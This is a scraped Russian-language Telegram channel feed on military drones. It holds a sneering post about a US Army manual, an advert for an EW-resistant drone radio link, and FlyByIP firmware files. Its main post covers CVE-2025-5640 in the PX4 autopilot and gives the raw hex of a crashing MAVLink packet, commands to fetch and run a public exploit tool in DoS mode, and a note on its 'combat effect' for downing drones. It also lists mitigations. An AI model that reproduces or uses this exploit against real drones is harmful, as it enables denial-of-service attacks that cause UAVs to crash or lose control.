ПОЛЕЗНАЯ НАГРУЗКА
7.41K subscribers
4.64K photos
335 videos
428 files
1.56K links
Полезная нагрузка — платформа, посвящённая инновационным разработкам, технологиям и решениям в области беспилотных летательных аппаратов (БПЛА). Здесь мы собираем всё самое актуальное: от инженерных идей и программного обеспечения до реальных испытаний.
Download Telegram
Свежий мануал армии США для танковых войск

Танкистов учат стрелять из основного орудия по дронам & подавать сигнал об атаке БПЛА с помощью размахивания руками.

🙂🙂🙂🙂🙂🙂🙂
Комментировать - только портить.

Похоже на псиоп, ну не могут же они быть такими дегенер*тами 😔

⭐️ Полезная Нагрузка
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3
Связь «Пеппа», показывающая результат!
Связь проявила себя на многих направлениях СВО, благодаря используемым нестандартным частотам и собственному шифрованному протоколу радиообмена, и показала свою эффективность.
Устанавливается на дроны крупных производителей БПЛА.
Доступны:
- проводной вынос со входом BNC для подключения НСУ 2.0 и более старших моделей;
- беспроводной вынос со штатным подключением приемников ELRS/TBS;
- легкий воздушный ретранслятор со штатным подключением приемников ELRS/TBS;
- пультовой модуль с возможностью подключения пультов управления по USB и работы с проводным выносом через кабель по интерфейсу RS-485.

Характеристики и комплектация:
- дальность связи подтверждена в боевых условиях до 30 км (до 100 км при использовании усилителя или ретрансляторов);
- устойчива к РЭБ, благодаря нестандартным частотам;
- все программное обеспечение собственной разработки;
- совместима с любым полетным контроллером по протоколу CRSF;
- приемники формируют показания RSSI и LQ;
- работает на частотах от 150 до 960МГц;
- выходная мощность без сторонних усилителей 2Вт;
- устойчивый к подмене и копиям пакетов протокол;
- надежное шифрование всего радио обмена алгоритмом AES128;
- позволяет работать рядом нескольким операторам БПЛА без взаимных помех.

Обзор противника на связь

Заказать специальную связь Пеппа
1🔥1
CVE-2025-5640: "один пакет - минус дрон"
https://github.com/PX4/PX4-Autopilot/issues/24915
PX4 Autopilot до v1.12.3 содержит критичное переполнение стека при разборе MAVLink-сообщения TRAJECTORY_REPRESENTATION_WAYPOINTS (Msg ID 332). Достаточно одной сформированной датаграммы, чтобы процесс mavlink_receiver упал, а птичка перешла в фэйлсейв или полностью потеряла управление

Что именно ломается
- Файл: src/modules/mavlink/mavlink_receiver.cpp
- Функция:  handle_message_trajectory_representation_waypoints(). 
    Буфер для waypoints лежит на стеке и меньше максимального размера сообщения; лишние байты переписывают соседнюю память - ядро гасит поток по SIGABRT

Как повторить атаку
1. Запустить PX4 SITL (jMAVSim).
2. Отправить “длинный” пакет - пример hex уже приведён в issue:
fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b7812731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6354242bdfcef1427429d762cbabe7d3bd9ad7b292fd206fecbc6bd8dee4422f129bb72794905979f8b369b415bacac087b028626846093354bca7cdf5b3aeca117b2f906e83e1fde3e5421fe6b689cd4f9359cdadc82086
3. Через пару секунд симулятор падает, что в боевых условиях означает потерю птички

Готовый инструмент.
https://github.com/mbanyamer/PX4-Military-UAV-Autopilot-1.12.3-Stack-Buffer-Overflow-Exploit-CVE-2025-5640-
Загрузим репозиторий и установим pymavlink для запуска скрипта.
$ git clone https://github.com/mbanyamer/PX4-Military-UAV-Autopilot-1.12.3-Stack-Buffer-Overflow-Exploit-CVE-2025-5640- PX4_CVE-2025-5640
$ cd PX4_CVE-2025-5640
$ pip install pymavlink

PoC на питоне рассылает пакет по UDP 14540/14550:
python3 px4_military_exploit.py --mode dos

Есть режим “check” для проверки живости птички(соединения)
python3 px4_military_exploit.py --mode check --ip 192.168.10.10 --port 14550


Боевой эффект
- Для наших расчётов птичек: риск потерять разведывательный или ударный борт в момент выхода на цель.
- Для противника:дешёвый DoS без мощной РЭБ - достаточно маломощного SDR, попадающего в тот же диапазон связи.
   
VPN снижает, но не убирает угрозу. При глушении LTE/Starlink туннель рвётся и MAVLink идёт "чистым". Кроме того, RF-injection в 915 МГц или 2.4 ГГц происходит до TCP/IP-уровня, а значит пакет-убийца долетит, если сигнатура не фильтруется на радиомодеме


Чем закрываться
1. Обновиться. Хотел тут отметить, что версия 1.12.3(https://github.com/PX4/PX4-Autopilot/releases/tag/v1.12.3) вышла еще в сентябре 2021, было бы странно увидеть у себя её, однако от схожих проблем советую рекомендации ниже
2. Можно собрать с ASAN (make px4_sitl_default clang_asan) - ловит подобные баги до вылета в бою.
3. Включить MAVLink 2 + signing (MAV_0_SIGNING=1) - неподписанные пакеты будут отброшены.
4. Фильтрация Msg 332 и схожих на прокси (MAVProxy/Router) или в коде
5. Закрыть порты телеметрии за файрволом, отделять трафик в отдельный VLAN/меш, отслеживать обрывы впн.
6. Настройка фэйлсейф на "RTL -> Land" вместо зависания: падение процесса не должно превращать аппарат в стационарную мишень.

При просмотре mavlink_receiver.cpp в свежих версиях, там не оказалось обработки сообщения с идентификатором MAVLINK_MSG_ID_TRAJECTORY_REPRESENTATION_WAYPOINTS (332) и не включает уязвимую функцию handle_message_trajectory_representation_waypoints

Вместо заключения: CVE-2025-5640 показывает, что иногда легче “выстрелить” пакетом, чем жечь ваттами помех.
1
IP-V-Encoder_v1.pdf
19.6 KB
Очень интересные документы противника.

https://silvustechnologies.com/products/streamcaster-radios/

Находиться за 120км от ЛБС в комфортных условиях, выполняя задачу…хочется верить, что мы работаем над спутниковой связью и рассчитываем не только на 5-15км. и «чудесную» оптику.

Потапов. Подписаться
Media is too big
VIEW IN TELEGRAM
Joystick - Mission planner - mavlink - udp/IP network - FBI - crsf - elrs tx - rx - FC betaflight
P.S Подглядели у противника
2👏1
Потапов. АО «НПП».
IP-V-Encoder_v1.pdf
flybyip-v1.14-RC16.fw
952 KB
Прошивка(Beta, обновлено 2025.07.12)
FlyByIP_v1_14.pdf
1.4 MB
Инструкция(Beta, обновлено 2025.06.04)
FlyByIP_v1_14_brief.pdf
17.9 KB
ТТХ(Beta, обновлено 2025.06.04)
flybyip-v1.12-RC10.fw
884 KB
Прошивка(обновлено 2025.06.30)
FlyByIP_v1_12.pdf
1.4 MB
Инструкция(обновлено 2025.05.21)
FlyByIP_v1_12_brief.pdf
17.8 KB
ТТХ(обновлено 2025.05.21)

⭐️ Полезная Нагрузка
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2